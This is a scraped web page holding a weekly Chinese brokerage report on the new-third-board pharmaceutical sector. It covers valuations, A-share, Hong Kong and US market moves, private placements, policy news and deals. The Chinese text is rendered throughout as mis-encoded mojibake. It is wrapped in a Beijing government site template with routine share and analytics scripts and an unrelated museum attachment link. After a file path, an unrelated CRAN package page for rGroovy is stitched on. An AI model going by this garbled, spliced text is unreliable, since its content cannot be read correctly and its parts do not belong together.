<p>¡¡¡¡<strong>Èý</strong><strong><span>°åÒ½Ò©°å¿é¹Àֵˮƽ½ÏÈý°åÕûÌåÒç¼Û20%£¬½ÏA¹ÉÒ½Ò©°å¿éÕÛ¼Û23%¡£</span></strong><span>½ØÖ¹2017Äê4ÔÂ8ÈÕ£¬ÐÂÈý°åÒ½Ò©°å¿é¹ÀֵΪ31X£¨TTM£¬ÕûÌå·¨ÌÞ³ý¸ºÖµ£©£¬A¹ÉÒ½Ò©°å¿é¹ÀֵΪ41X¡£<span>ÐÂÈý°åÒ½Ò©°å¿é¶ÔÓÚÐÂÈý°å¹ÒÅÆÆóÒµÕûÌåµÄ¹ÀÖµÒç¼ÛÂÊΪ20%£»ÐÂÈý°åÒ½Ò©°å¿é¶ÔÓÚ</span>A¹É<span>Ò½Ò©°å¿éÕÛ¼Û23%</span>£¬A¹ÉÒ½Ò©°å¿éPEÆÕ±é¸ßÓÚÐÂÈý°åPEÖ÷ÒªÔ´ÓÚÁ½¸ö·½Ã棺µÚÒ»£¬Ö÷°åÁ÷¶¯ÐÔÇ¿ÓÚÐÂÈý°å£¬Ö÷°å¹«Ë¾±»Æµ·±½»Ò×£¬ÐÂÈý°å¹«Ë¾µÄ½»Òײ»»îÔ¾£»µÚ¶þ£¬ÐÂÈý°åÆóҵͶ×Ê·çÏÕÏà¶Ô¸ßÓÚÖ÷°å¹«Ë¾£¬ÎªÁËÃÖ²¹Í¶×ÊÕߵķçÏÕÒç¼Û£¬¹ÉƱ¹ÀÖµÏà¶Ô½ÏµÍ¡£´óÅÌÕûÌåС·ùÉÏÕÇ£¬ÐÂÈý°åÒ½Ò©°å¿é±íÏÖÀàËÆ£¬¹ÀÖµ×ÜÌå±£³ÖÎȶ¨£¬Òç¼ÛÂÊ×ÜÌå±£³ÖÎȶ¨¡£</span><span></span><span></span><span></span></p>
<p>¡¡¡¡<img src="http://img.mp.itc.cn/upload/20170410/50cce4b4227c420fa2e18b69d931c1f7_th.jpeg" /></p>
<p>¡¡¡¡<strong><strong><strong><strong>A¹ÉÊг¡Ò½Ò©ÐÐÒµÊг¡½»Ò׻عË</strong></strong></strong></strong></p>
<p>¡¡¡¡<strong><span style="font-size: 14px;">Êг¡»Ø¹Ë¡£</span></strong><span style="font-size: 14px;">ÉÏÖÜA¹ÉÊг¡Ò½Ò©°å¿éС·ùÉÏÕÇ¡£ÉêÍòÒ½Ò©ÐÐÒµÖ¸ÊýÉÏÕÇ1.05%£¬ÅÜÊ仦Éî300Ö¸Êý0.73pcts£¬239¼Ò¹«Ë¾Öй²174¼Ò¹«Ë¾ÉÏÕÇ£¬ÆäÖи¨ÈÊÒ©Òµ¡¢Íò¶«Ò½ÁÆ¡¢²©êÍ´´ÐÂÕÇ·ù¾Óǰ£¬·Ö±ðÉÏÕÇ9.91%/8.11%/7.59%¡£¹²56¼Ò¹«Ë¾Ïµø£¬ÆäÖÐлªÒ½ÁÆ¡¢Â¤ÉñÈÖ·¢¡¢¾«»ªÖÆÒ©µø·ù¾Óǰ,·Ö±ðϵø7.29%/5.79%/4.5%¡£¸ù¾ÝÉêÍòÒ½Ò©Ò»¼¶ÐÐÒµÖ¸Êý£¬Ò½Ò©°å¿é´¦ÓÚ¸÷ϸ·Ö×ÓÐÐÒµÏÂÓÎˮƽ£¬Î»ÓÚ28¸öÒ»¼¶×ÓÐÐÒµÖеÚ22λ¡£</span></p>
<p>¡¡¡¡<img src="http://img.mp.itc.cn/upload/20170410/6e1010a27eff4215a67ea73b5f7d7526_th.jpeg" /></p>
<p>¡¡¡¡<img src="http://img.mp.itc.cn/upload/20170410/8ab2f4542d2140e299568f5b9d727b76_th.jpeg" /></p>
<p>¡¡¡¡<strong><strong><strong><strong><strong>º£ÍâÊг¡Ò½Ò©ÐÐÒµÊг¡½»Ò׻عË</strong></strong></strong></strong></strong></p>
<p>¡¡¡¡<strong><span style="font-size: 14px;">¸Û¹ÉÊг¡½»Ò׻عˡ£</span></strong><span style="font-size: 14px;">ÉÏÖܺãÉúÖ¸ÊýÊÕÓÚ24267.3µã£¬Ïµø0.14%¡£¸Û¹ÉÒ½Ò©°å¿é¹É·ÝÕÇ·ùǰÎåλ·Ö±ðÊÇÁªºÏÒ½Îñ£¨16.92%£©¡¢¿µ³¼Ò©Òµ£¨15.78%£©¡¢ËÄ»·Ò½Ò©£¨7.8%£©¡¢ÖйúÒ½ÁƼ¯ÍÅ£¨7.33%£©¡¢¿µ»ªÒ½ÁÆ£¨6.9%£©£»ºóÎå·Ö±ðÊÇ׿çì¿Ø¹É£¨-17.35%£©¡¢»ªÏÄÒ½ÁÆ£¨-8.55%£©¡¢ÐÂÈñÒ½Ò©£¨-7.95%£©¡¢°ÙÐÅÒ©Òµ£¨-6.52%£©¡¢ºëºÍÈʰ®Ò½ÁÆ£¨-6.3%£©¡£</span></p>
<p>¡¡¡¡<img src="http://img.mp.itc.cn/upload/20170410/636c3704eddd449690575444f9928515.jpeg" /></p>
<p>¡¡¡¡<strong><span style="font-size: 14px;">ÃÀ¹ÉÖиŹÉÒ½Ò©ÐÐÒµ½»Ò׻عˡ£</span></strong><span style="font-size: 14px;">ÉÏÖÜÃÀ¹úÖÐ×ʹÉ12¼ÒÒ½Ò©¹«Ë¾ÖÐÖйúÆê´øÑª¿âÁìÕÇ£¬ÕÇ·ùΪ9.61%£»³É½»·½Ã棬ÉÏÖÜÖиŹÉÒ½Ò©ÐÐÒµ³É½»×ÜÁ¿407.42Íò¹É£¬½ÏÉÏÉÏÖÜ442.57Íò¹ÉС·ùϽµ7.9%¡£ÆäÖÐÖйúÆê´øÑª¿â¡¢Ì©°îÉúÎï¡¢°Ù¼ÃÉñÖݽ»Í¶»îÔ¾£¬Öܳɽ»Á¿·Ö±ðΪÖܳɽ»Á¿£¨Íò¹É£©92.72/68.55/54.81Íò¹É¡£</span></p>
<p>¡¡¡¡<img src="http://img.mp.itc.cn/upload/20170410/203502925efd43bb86fad893ac572d52_th.jpeg" /></p>
<p>¡¡¡¡<img src="http://img.mp.itc.cn/upload/20170410/dd13f6826aef405083ddf7fa165f51fb_th.jpeg" /></p>
<p>¡¡¡¡<strong><strong><strong>ÐÂÈý°åÒ½Ò©ÐÐÒµ¶¨ÔöÈÚ×ÊÊг¡»Ø¹Ë</strong></strong></strong></p>
<p>¡¡¡¡<strong><span>ÉÏÖÜÐÂÈý°åÓÐ2¼ÒÒ½Ò©ÆóÒµ¹«²¼¶¨ÔöÔ¤°¸£¬Ô¤¼ÆÄ¼¼¯×ʽð2.41ÒÚÔª£¬Ä¼×ʺóPE£¨TTM£©Îª21X¡£</span></strong><span>½üËÄÖÜÐÂÈý°åÒ½Ò©ÐÐÒµÄâÈÚ×ʶî11.49ÒÚÔª¡£</span></p>
<p>¡¡¡¡<strong><span>ÉÏÖÜÐÂÈý°åÒ½Ò©ÐÐÒµÊг¡Êµ¼Êļ×Ê1.78ÒÚÔª£¬Ä¼×ʺóPE£¨TTM£©Îª24X¡£</span></strong><span>½üËÄÖÜÐÂÈý°åÒ½Ò©ÐÐÒµ¹²20¼Ò¹«Ë¾ÊµÊ©¶¨ÏòÔö·¢£¬Êµ¼Êļ×Ê×ܶî´ï14.34ÒÚÔª£¬½ÏÉÏÔÂͬÆÚ8.17ÒÚÔªÌá¸ß75.52%£¬½üËÄÖÜÆ½¾ùļ×ʺóPE£¨TTM£©Îª24X£¬2016ÄêÖÁ½ñÐÂÈý°å¹ÒÅÆÒ½Ò©Æóҵʵ¼Êļ×Ê×ܶî´ï127ÒÚÔª¡£</span></p>
<p>¡¡¡¡<img src="http://img.mp.itc.cn/upload/20170410/83e586148a81415f8be433914257742f.jpeg" /></p>
<p>¡¡¡¡<strong><strong><strong><strong>Ò½ÁÆÐÐÒµÐÂÎŻعË</strong></strong></strong></strong></p>
<p>¡¡¡¡<strong>Ò½Õþ×ÊѶ£º<span>±±¾©½«ÊµÊ©Ò½Ò©·Ö¿ª×ۺϸĸҩ¼Ûƽ¾ù½µ·ù´ï20%×óÓÒ</span></strong></p>
<p>¡¡¡¡<strong><span>ÖØ</span></strong><strong><span>µã×ÛºÏҽѶ£º</span></strong><strong><span>1.</span></strong><span>¹ú¼ÒʳƷҩƷ¼à¶½¹ÜÀí×ܾÖÈÕǰ·¢²¼¡¶ÍøÂçÒ½ÁÆÆ÷е¾ÓªÎ¥·¨ÐÐΪ²é´¦°ì·¨(Õ÷ÇóÒâ¼û¸å)¡·¡£Òâ¼û¸åÌá³ö£¬´ÓÊÂÍøÂçÒ½ÁÆÆ÷е¾ÓªµÄÆóÒµºÍÍøÂçÒ½ÁÆÆ÷е½»Ò×·þÎñµÚÈý·½Æ½Ì¨Î´°´¹æ¶¨±¸°¸µÄ£¬ÓÉÉèÇøµÄÊм¶¼°ÒÔÉϵط½Ê³Æ·Ò©Æ·¼à¶½¹ÜÀí²¿ÃÅÔðÁî¸ÄÕý£¬²¢´¦5000ÔªÒÔÉÏ3ÍòÔªÒÔÏ·£¿î¡££¨ÐÅÏ¢À´Ô´£ºCFDA£©<span style="text-decoration: underline;">½â¶Á£ºÀûºÃÍøÂçÒ½ÁÆÆ÷е½»Ò׹淶»¯¡£</span><strong>2.</strong>4ÔÂ8ÈÕÆð£¬±±¾©Êн«ÊµÊ©Ò½Ò©·Ö¿ª×ۺϸĸҩƷÑô¹â²É¹º×÷Ϊ¸Ä¸ï´ëʩ֮һ£¬½«ËæÖ®Í¬²½ÊµÊ©¡£ÔÚ±£Ö¤Ò©Æ·ÖÊÁ¿¡¢°²È«µÄǰÌáÏ£¬¶¯Ì¬Áª¶¯Í¬³§¼Ò¡¢Í¬Æ·¹æÒ©Æ·µÄÈ«¹úÊ¡¼¶Ò©Æ·¼¯Öвɹº×îµÍÖбê¼Û¸ñ£¬²¢ÔÚÑô¹â²É¹ºÆ½Ì¨ÓèÒÔ¹«Ê¾¡££¨ÐÅÏ¢À´Ô´£º±±¾©Íí±¨£©<span style="text-decoration: underline;">½â¶Á£ºÓÐÖúÓÚÈ¡ÏûÒ©Æ·¼Ó³É£¬Ê¹µÃÒ©Æ·¼Û¸ñϽµ£¬ÀûºÃÒ½±£¿Ø·Ñ¡£</span></span></p>
<p>¡¡¡¡<img src="http://img.mp.itc.cn/upload/20170410/af552a67c25842fc93547c926ccd0abe_th.jpeg" /></p>
<p>¡¡¡¡<img src="http://img.mp.itc.cn/upload/20170410/47d34103f7b84c93946d1123d6207f08_th.jpeg" /></p>
<p>¡¡¡¡<strong>Ò½ÈÚ×ÊѶ£º<span></span><span><span><span><span>¿µµÂÀÖÊÕ¹ºÃÀ¶ØÁ¦Ò½ÁƲúÆ·ÒµÎñ£¬Ò½ÁÆÓ°ÏñÉ豸¹«Ë¾»ñǧÍòÈÚ×Ê</span></span></span></span><span></span></strong></p>
<p>¡¡¡¡<strong>×ʲúÊÕ¹º·½Ã棺</strong></p>
<p>¡¡¡¡<strong><span>1.</span></strong><strong><span>ÃÀ¹úÒ©ÉÌ¿µµÂÀÖ½¡¿µ(Cardinal Health)ÄâÒÔ½ü60ÒÚÃÀÔªÊÕ¹ºÒ½ÁÆÒÇÆ÷ÖÆÔìÉÌÃÀ¶ØÁ¦µÄÒ½ÁÆÓÃÆ·ÒµÎñ¡£</span></strong><span>¾ÝϤ£¬ÃÀ¶ØÁ¦ºÍ¿µµÂÀÖ½¡¿µÒѽøÈëÅÅËû̸Åн׶Σ¬½»Ò׿ÉÄÜÓÚ±¾ÔÂÉԺ󹫲¼¡£¿µµÂÀÖ½¡¿µ×ܲ¿Î»ÓÚÃÀ¹ú¶íº¥¶íÖݶ¼°ØÁÖ£¬ÊÇÃÀ¹ú×î´óµÄÒ½Ò©·ÖÏúÉÌÖ®Ò»£¬´ËÍ⻹Éú²úÒ½ÁƺÍÊÖÊõ²úÆ·£¬°üÀ¨ÊÖÌס¢ÊÖÊõÒºÍÁ÷Ìå¿ØÖÆ²úÆ·¡£Óë´Ëͬʱ£¬¿µµÂÀÖ»¹¾ÓªÃÀ¹ú×î´óµÄ·ÅÉäÐÔÒ©ÎïÍøÂç¡£¸Ã¹«Ë¾ÔÚÃÀ¹ú²Æ¸»500Ç¿ÖÐÅÅÃûµÚ22룬ÔÚÈ«ÇòÓµÓÐ3.4ÍòÃûÔ±¹¤¡££¨ÐÅÏ¢À´Ô´£ºÖÇͨ²Æ¾Íø£©</span></p>
<p>¡¡¡¡<strong><span>2.</span></strong><strong><span>ºº¶¦ÓîÓÓ¼¯ÍźÍÃÀ¹ú¼ÓÖݽ¡¿µ¿Æ¼¼¼¯ÍÅ£¬¹²Í¬³â¾Þ×ÊÊÕ¹ºÁËÒ»¼ÒÃûΪCare ConnectorsµÄ¹«Ë¾9.43%µÄ¹É·Ý¡£</span></strong><span>ÃÀ¹ú¼ÓÖݽ¡¿µ¿Æ¼¼¼¯ÍżÌÐû²¼»ñµÃ¡°ºº¶¦ÓîÓÓ¼¯ÍÅ¡±4000ÍòÃÀÔªAÂÖÈÚ×ʺó£¬Ë«·½ÓÚ½üÈÕ¹²Í¬³â¾Þ×ÊÊÕ¹ºÁËÃÀ¹úÒ»¼Ò¼¯¿Æ¼¼´´ÐÂÓëÒ½Éú×ÊÔ´¹ÜÀíÓÚÒ»ÌåµÄ±£ÏÕ¹ÜÀí¹«Ë¾¡°Care Connectors¡±9.43%µÄ¹É·Ý£¨¸Ã¹«Ë¾»ñͶºó¹ÀÖµÒÑÍ»ÆÆ3ÒÚÃÀÔª£©¡£´Ë´ÎÊÕ¹ºÖ®¾Ù£¬ÊǼÓÖݽ¡¿µ¿Æ¼¼¼¯ÍÅÓ뺺¶¦ÓîÓÓ¼¯ÍÅ£¬ÔÚÃÀ¹úÒ½ÁƱ£ÏÕ¡¢Ò½ÁÆ×ÊÔ´¡¢Ò½ÁÆ´óÊý¾ÝͶ×ÊÁìÓòµÄÈ«ÐÂÉý¼¶¡££¨ÐÅÏ¢À´Ô´£ºÖйúÍø£©</span></p>
<p>¡¡¡¡<strong><span>¶ÔÍâÈÚ×Ê·½Ã棺</span></strong></p>
<p>¡¡¡¡<strong><span>1.</span></strong><strong><span>ÉϺ£ÓÅÒ½»ùÒ½ÁÆÓ°ÏñÉ豸ÓÐÏÞ¹«Ë¾»ñµÃ»ªÒ½×ʱ¾¶À¼ÒǧÍò¼¶Í¶×Ê£¬ÇÒÒѺÏ×÷Íê³ÉAÂÖÈÚ×Ê¡£</span></strong><span>¹«Ë¾³ÉÁ¢ÓÚ2007Ä꣬ÊǼ¯¿ÆÑкÍÉú²úΪһÌåµÄÒ½ÁÆÆ÷еÑз¢¹«Ë¾£¬Ò½ÁƲúÆ·°üº¬¿ÚÇ»CT¡¢ÊÖÊõµ¼º½ÏµÍ³¡¢¹è»ù´´ÃæÐÞ¸´²ÄÁÏ¡¢´´ÐÂÐÍÒ»´ÎÐÔ´©´ÌÆ÷¼°´´ÐÂÐÍÄÚ¾µÊÖÊõÆ÷еµÈ¡£Ôڵ¹ú¿ÆÂ¡¹ú¼Ê¿ÚǻչÉÏ£¬ÓÅÒ½»ù·¢²¼ÁËÈ«ÇòÊ׿î¾ßÓÐ×ÔÖ÷֪ʶ²úȨµÄÄÜÆ×¿ÚÇ»CBCTÉ豸¡£¸ÃÉ豸Äܹ»Ìṩ¸ü¾«È·µÄÈýά½á¹¹ÐÅÏ¢£¬Ó¦ÓÃÔÚÑÀ³ÝÏà¹Ø¼²²¡µÄÕï¶ÏºÍÑÀ¿ÆÊÖÊõÕï¶ÏÖС££¨ÐÅÏ¢À´Ô´£ºÒ½¹È£©</span></p>
<p>¡¡¡¡<strong><span>2.</span></strong><strong><span>³õ´´¹«Ë¾LAM Therapeutics»ñµÃ5800ÍòÃÀÔªCÂÖÈÚ×Ê£¬²¢×¼±¸¿ªÆôÒ»¸öÐµİ©Ö¢ÁÙ´²Ñо¿ÏîÄ¿¡£</span></strong><span>LAM Therapeutics</span><span>³ÉÁ¢ÓÚ2013Ä꣬ÊÇÃÀ¹úÖøÃû·õ»¯Æ÷¹«Ë¾4CatalyzerÆìϵijõ´´¹«Ë¾£¬ÖÂÁ¦ÓÚÑз¢°©Ö¢¼°º±¼û²¡ÐÂÒ©¡£LAM½«»ùÒò×éѧºÍµ°°×ÖÊ×éѧ¼¼ÊõÓëÉî¶ÈѧϰÈ˹¤ÖÇÄÜ£¨AI£©Ïà½áºÏÀ´¼ÓËÙÒ©Î↑·¢£¬²¢Ñ°ÕÒÁÙ´²Ò©ÎïµÄеÄÊÊÓ¦Ö¢¡££¨ÐÅÏ¢À´Ô´£º´´¼ø»ã£©</span></p>
<p>¡¡¡¡<strong><span>3. </span><span>°Ä´óÀûÑǵÄÒ½ÁÆÆ÷е¹«Ë¾Bionic Vision Technologies£¨BVT£©Ðû²¼»ñµÃÁË1800ÍòÃÀԪͶ×Ê¡£</span></strong><span>´ËÂÖÈÚ×ÊÓÉÖйú£¨Ïã¸Û£©»ªÈÚ¹ú¼Ê¿Ø¹ÉÓÐÏÞ¹«Ë¾ºÍState Path Capital LimitedÁªºÏͶ×Ê¡£¾ÝϤ£¬´ËÂÖÈÚ×ʽ«ÓÃÓÚÍÆ¶¯¹«Ë¾·ÂÉúÊÓ¾õ¼¼ÊõµÄÑо¿ºÍ·ÂÉúÊÓ¾õÉ豸µÄÁÙ´²ÊÔÑé¼°ÉÌÒµ»¯Íƹ㡣£¨ÐÅÏ¢À´Ô´£º´´¼ø»ã£©</span></p>
<p>¡¡¡¡<strong><strong><strong>Ò½Ò©ÐÐҵÿÖÜÖØÒª¹«¸æ»Ø¹Ë</strong></strong></strong></p>
<p>¡¡¡¡<img src="http://img.mp.itc.cn/upload/20170410/fdcb603231fa4e729bd4c71ff2c451b0.jpeg" /></p>
<p>¡¡¡¡<img src="http://img.mp.itc.cn/upload/20170410/03ae99c033d44bc2b0cd79a96f8019e3_th.jpeg" /></p>
<p>¡¡¡¡<img src="http://img.mp.itc.cn/upload/20170410/823ac2d87b0343f5b256f6c29c9f1961_th.jpeg" /></p>
<p>¡¡¡¡<img src="http://img.mp.itc.cn/upload/20170410/bb58fa6a8f3a4575837aa689818436f5.png" /></p>
<p>¡¡¡¡ÌرðÉùÃ÷</p>
<p>¡¡¡¡±¾×ÊÁÏËùÔØµÄÐÅÏ¢½öÃæÏòרҵͶ×Ê»ú¹¹£¬½ö¹©ÔÚÐÂýÌå±³¾°ÏÂÑо¿¹ÛµãµÄ¼°Ê±½»Á÷¡£±¾×ÊÁÏËùÔØµÄÐÅÏ¢¾ùÕª±à×ÔÖÐÐÅ֤ȯÑо¿²¿ÒѾ·¢²¼µÄÑо¿±¨¸æ»òÕßϵ¶ÔÒÑ·¢²¼±¨¸æµÄºóÐø½â¶Á£¬ÈôÒò¶Ô±¨¸æµÄÕª±à¶ø²úÉúÆçÒ壬ӦÒÔ±¨¸æ·¢²¼µ±ÈÕµÄÍêÕûÄÚÈÝΪ׼¡£±¾×ÊÁϽö´ú±í±¨¸æ·¢²¼µ±ÈÕµÄÅжϣ¬Ïà¹ØµÄ·ÖÎöÒâ¼û¼°ÍƲâ¿ÉÔÚ²»·¢³ö֪ͨµÄÇéÐÎÏÂ×ö³ö¸ü¸Ä£¬¶ÁÕ߲ο¼Ê±»¹Ð뼰ʱ¸ú×ÙºóÐø×îеÄÑо¿½øÕ¹¡£</p>
<p>¡¡¡¡±¾×ÊÁϲ»¹¹³É¶Ô¾ßÌå֤ȯÔÚ¾ßÌå¼Ûλ¡¢¾ßÌåʱµã¡¢¾ßÌåÊг¡±íÏÖµÄÅжϻòͶ×ʽ¨Ò飬²»Äܹ»µÈͬÓÚÖ¸µ¼¾ßÌåͶ×ʵIJÙ×÷ÐÔÒâ¼û£¬ÆÕͨµÄ¸öÈËͶ×ÊÕßÈôʹÓñ¾×ÊÁÏ£¬ÓпÉÄÜ»áÒòȱ·¦½â¶Á·þÎñ¶ø¶Ô±¨¸æÖеĹؼü¼ÙÉè¡¢ÆÀ¼¶¡¢Ä¿±ê¼ÛµÈÄÚÈݲúÉúÀí½âÉÏµÄÆçÒ壬½ø¶øÔì³ÉͶ×ÊËðʧ¡£Òò´Ë¸öÈËͶ×ÊÕß»¹ÐëѰÇóרҵͶ×ʹËÎʵÄÖ¸µ¼¡£±¾×ÊÁϽö¹©²Î¿¼Ö®Ó㬽ÓÊÕÈ˲»Ó¦µ¥´¿ÒÀ¿¿±¾×ÊÁϵÄÐÅÏ¢¶øÈ¡´ú×ÔÉíµÄ¶ÀÁ¢Åжϣ¬Ó¦×ÔÖ÷×÷³öͶ×ʾö²ß²¢×ÔÐге£Í¶×Ê·çÏÕ¡£</p>
<p>¡¡¡¡<img src="http://img.mp.itc.cn/upload/20170410/fffa7057dbba48bb8c84ed3b7d25d556_th.jpeg" /></p>
<p>¡¡¡¡<strong><span style="font-size: 14px;">*µã»÷Ï·½ÔĶÁÔÎIJ鿴ÖÐÐÅÐÂÈý°åÑо¿ÍŶÓÒ½Ò©×éÓÚ4ÔÂ10ÈÕÕýʽÍâ·¢µÄ±¨¸æ£º</span><span style="font-size: 14px;">¡¶</span><span style="font-size: 14px;">ÐÂÈý°åÒ½Ò©ÐÐÒµÖܱ¨£¨2017ÄêµÚ14ÆÚ£©¡ª±±¾©Ò½¸ÄÕþ²ßÂ䵨£¬Ò½ÁÆÓ°ÏñÉ豸¹«Ë¾»ñǧÍòÈÚ×Ê</span><span style="font-size: 14px;">¡·</span></strong></p>
</p></div>
<div id="filerider">
<div class="filelink" style="margin:10px 0 0 0;"><a href="./P020160207382291268334.doc">¸½¼þ£º2016Äê±±¾©µØÇø²©Îï¹Ý´º½ÚϵÁлһÀÀ±í</a></div>
</div>
</div>
<div id="essaybottom" style="border:0; overflow:hidden; margin-bottom:0;">
<div style="padding-bottom:8px;" id="proclaim"><p style="float:left; line-height:30px;">·ÖÏíµ½£º</p><div class="bdsharebuttonbox"><a href="#" class="bds_more" data-cmd="more"></a><a href="#" class="bds_qzone" data-cmd="qzone"></a><a href="#" class="bds_tsina" data-cmd="tsina"></a><a href="#" class="bds_tqq" data-cmd="tqq"></a><a href="#" class="bds_renren" data-cmd="renren"></a><a href="#" class="bds_weixin" data-cmd="weixin"></a></div>
<scRipt>window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdPic":"","bdStyle":"0","bdSize":"16"},"share":{},"image":{"viewList":["qzone","tsina","tqq","renren","weixin"],"viewText":"·ÖÏíµ½£º","viewSize":"16"},"selectShare":{"bdContainerClass":null,"bdSelectMiniList":["qzone","tsina","tqq","renren","weixin"]}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('scRipt')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];</scRipt></div>
</div>
<div id="essaybottom" style="margin-top:0;">
<div style="padding-bottom:8px;" id="proclaim">תժÉùÃ÷£º×ªÕªÇë×¢Ã÷³ö´¦²¢×ö»ØÁ´</div>
</div>
</div>
</div>
<!-- /container -->
<div id="footer">
<div class="container">
<div class="span1" style="text-align:center"><scRipt type="text/javascRipt">document.write(unescape("%3Cspan id='_ideConac' %3E%3C/span%3E%3CscRipt src='http://dcs.conac.cn/js/01/000/0000/60429971/CA010000000604299710004.js' type='text/javascRipt'%3E%3C/scRipt%3E"));</scRipt></div>
<div class="span8">
<div class="footer-top">
<div class="footer-class">
<p> <a title="¹ØÓÚÎÒÃÇ" href="http://www.beijing.gov.cn/zdxx/sdzcjs/t1306339.htm" style=" background:0">¹ØÓÚÎÒÃÇ</a><a target="_blank" title="Õ¾µãµØÍ¼" href="http://www.beijing.gov.cn/zdxx/sdzcjs/t1306342.htm">Õ¾µãµØÍ¼</a><a target="_blank" title="ÁªÏµÎÒÃÇ" href="http://www.beijing.gov.cn/zdxx/sdzcjs/t1306343.htm">ÁªÏµÎÒÃÇ</a><a target="_blank" title="ÆÀ¼ÛÊ×¶¼Ö®´°" href="mailto:service@beijing.gov.cn">ÆÀ¼ÛÊ×¶¼Ö®´°</a><a target="_blank" title="·¨ÂÉÉùÃ÷" href="http://www.beijing.gov.cn/zdxx/t709204.htm">·¨ÂÉÉùÃ÷</a> </p>
<p>Ö÷°ì£º±±¾©ÊÐÈËÃñÕþ¸® °æÈ¨ËùÓга죺±±¾©Êо¼ÃºÍÐÅÏ¢»¯Î¯Ô±»á ¾©ICP±¸05060933ºÅ ÔËÐйÜÀí£ºÊ×¶¼Ö®´°ÔËÐйÜÀíÖÐÐÄ</p>
<p>¾©¹«Íø°²±¸ 110105000722 µØÖ·£º±±¾©Êг¯ÑôÇø±±³½Î÷·Êý×Ö±±¾©´óÏÃÄϰ˲㠴«Õ棺84371700 ¿Í·þÖÐÐĵ绰£º59321109</p>
</div>
</div>
</div>
</div>
</div>
<div style="display:none">
<scRipt type="text/javascRipt">document.write(unescape("%3CscRipt src='http://yhfx.beijing.gov.cn/webdig.js?z=12' type='text/javascRipt'%3E%3C/scRipt%3E"));</scRipt>
<scRipt type="text/javascRipt">wd_paramtracker("_wdxid=000000000000000000000000000000000000000000")</scRipt>
</div>
<scRipt src="http://static.gridsumdissector.com/js/Clients/GWD-800003-C99186/gs.js" language="JavaScript"></scRipt>
<scRipt type="text/javascRipt">
// ÉèÖÃΪÖ÷Ò³
function SetHome(obj,vrl){
try{
obj.style.behavior='url(#default#homepage)';obj.setHomePage(vrl);
}
catch(e){
if(window.netscape) {
try {
netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");
}
catch (e) {
alert("´Ë²Ù×÷±»ä¯ÀÀÆ÷¾Ü¾ø£¡\nÇëÔÚä¯ÀÀÆ÷µØÖ·À¸ÊäÈë¡°about:config¡±²¢»Ø³µ\nÈ»ºó½« [signed.applets.codebase_principal_support]µÄÖµÉèÖÃΪ'true',Ë«»÷¼´¿É¡£");
}
var prefs = Components.classes['@mozilla.org/preferences-service;1'].getService(Components.interfaces.nsIPrefBranch);
prefs.setCharPref('browser.startup.homepage',vrl);
}else{
alert("ÄúµÄä¯ÀÀÆ÷²»Ö§³Ö£¬Çë°´ÕÕÏÂÃæ²½Öè²Ù×÷£º1.´ò¿ªä¯ÀÀÆ÷ÉèÖá£2.µã»÷ÉèÖÃÍøÒ³¡£3.ÊäÈ룺"+vrl+"µã»÷È·¶¨¡£");
}
}
}
// ¼ÓÈëÊÕ²Ø ¼æÈÝ360ºÍIE6
function shoucang(sTitle,sURL)
{
try
{
window.external.addFavorite(sURL, sTitle);
}
catch (e)
{
try
{
window.sidebar.addPanel(sTitle, sURL, "");
}
catch (e)
{
alert("¼ÓÈëÊÕ²ØÊ§°Ü£¬ÇëʹÓÃCtrl+D½øÐÐÌí¼Ó");
}
}
}
</scRipt>
<!-- Le javascRipt
================================================== -->
<!-- Placed at the end of the document so the pages load faster -->
<scRipt src="/images/zhuanti/xysym/jquery.js"></scRipt>
<scRipt src="/images/zhuanti/xysym/bootstrap-collapse.js"></scRipt>
<scRipt>
$(document).ready(function(){
$(".ui-select").selectWidget({
change : function (changes) {
return changes;
},
effect : "slide",
keyControl : true,
speed : 200,
scrollHeight : 250
});
});
</scRipt>
</body>
</html> |
Code/GetMetaDataFromCRAN/raw_html/rGroovy.html | esander91/NamespacePollution | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>CRAN - Package rGroovy</title>
<link rel="stylesheet" type="text/css" href="../../CRAN_web.css" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<style type="text/css">
table td { vertical-align: top; }
</style>
</head>
<body>
<h2>rGroovy: Groovy Language Integration</h2>
<p>Integrates the Groovy scripting language with the R Project for Statistical Computing.</p>
<table summary="Package rGroovy summary">
<tr>
<td>Version:</td>
<td>1.0</td>
</tr>
<tr>
<td>Depends:</td>
<td><a href="../rJava/index.html">rJava</a></td>
</tr>
<tr>
<td>Suggests:</td>
<td><a href="../testthat/index.html">testthat</a></td>
</tr>
<tr>
<td>Published:</td>
<td>2015-10-31</td>
</tr>
<tr>
<td>Author:</td>
<td>Thomas P. Fuller</td>
</tr>
<tr>
<td>Maintainer:</td>
<td>Thomas P. Fuller <thomas.fuller at coherentlogic.com></td>
</tr>
<tr>
<td>License:</td>
<td><a href="../../licenses/LGPL-3">LGPL-3</a></td>
</tr>
<tr>
<td>Copyright:</td>
<td>(C) 2015 Coherent Logic Limited; ALL RIGHTS RESERVED.</td>
</tr>
<tr>
<td>URL:</td>
<td><a href="http://www.r-project.org">http://www.r-project.org</a>, <a href="http://groovy.codehaus.org/">http://groovy.codehaus.org/</a>,
<a href="http://www.groovy-lang.org/indy.html">http://www.groovy-lang.org/indy.html</a>,
<a href="http://docs.groovy-lang.org/latest/html/api/index.html">http://docs.groovy-lang.org/latest/html/api/index.html</a>,
<a href="https://coherentlogic.com/middleware-development/rgroovy?source=cran">https://coherentlogic.com/middleware-development/rgroovy?source=cran</a></td>
</tr>
<tr>
<td>NeedsCompilation:</td>
<td>no</td>
</tr>
<tr>
<td>SystemRequirements:</td>
<td>Java (>= 7.0)</td>
</tr>
<tr>
<td>Materials:</td>
<td><a href="NEWS">NEWS</a> </td>
</tr>
<tr>
<td>CRAN checks:</td>
<td><a href="../../checks/check_results_rGroovy.html">rGroovy results</a></td>
</tr>
</table>
<h4>Downloads:</h4>
<table summary="Package rGroovy downloads">
<tr>
<td> Reference manual: </td>
<td> <a href="rGroovy.pdf"> rGroovy.pdf </a> </td>
</tr>
<tr>
<td> Package source: </td>
<td> <a href="../../../src/contrib/rGroovy_1.0.tar.gz"> rGroovy_1.0.tar.gz </a> </td>
</tr>
<tr>
